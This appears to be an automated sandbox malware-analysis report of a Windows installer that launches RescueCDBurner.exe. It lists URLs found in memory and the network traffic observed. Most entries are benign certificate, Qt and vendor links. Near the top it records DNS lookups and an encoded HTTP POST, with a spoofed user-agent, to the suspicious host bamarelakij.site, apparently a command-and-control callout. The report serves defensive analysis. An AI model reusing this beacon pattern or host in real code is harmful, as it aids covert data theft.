Source: RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: [long embedded string block containing certificate names and serial numbers, omitted] equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic | DNS traffic detected: DNS query: c.msn.com
Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 147
Host: bamarelakij.site
Source: kXzODlqJak.exe | String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://grub4dos.chenall.net/e/%u)
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://isecure-a.reneelab.com/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://isecure.reneelab.com/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0L
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0W
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: RescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: http://qt.digia.com/
Source: RescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: http://qt.digia.com/product/licensing
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://support.reneelab.com/anonymous_requests/new
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcd.com0&
Source: RescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmp | String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: RescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmp | String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entityUnknown
Source: RescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmp | String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: RescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmp | String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa
Source: kXzODlqJak.exe, 00000001.00000003.1459181236.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1459030838.000000000084A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1488606798.000000000084A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1459030838.0000000000808000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1459181236.000000000084A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000002.1489490129.000000000084A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1488378320.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1459144152.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1486637750.0000000004B25000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000002.1489451204.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1486812451.0000000000900000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000001.00000003.1487305082.000000000084A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1485862396.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1485734936.0000000004E00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/schemas/v4/2008/Burn
Source: kXzODlqJak.exe, 00000002.00000002.1485862396.00000000051F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/schemas/v4/2008/BurnHdPmy
Source: kXzODlqJak.exe, 00000002.00000003.1482060334.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000003.1482136142.0000000002E00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/schemas/v4/BootstrapperApplicationData
Source: kXzODlqJak.exe, 00000002.00000003.1482060334.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000003.1482136142.0000000002E00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/schemas/v4/BundleExtensionData
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.???.xx/?search=%s
Source: RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.google-analytics.com/collect
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.0000000009584000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A2C9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843503254.0000000009840000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.info-zip.org/
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: http://www.phreedom.org/md5)
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.reneelab.biz/
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.reneelab.cc/
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.reneelab.com.cn/
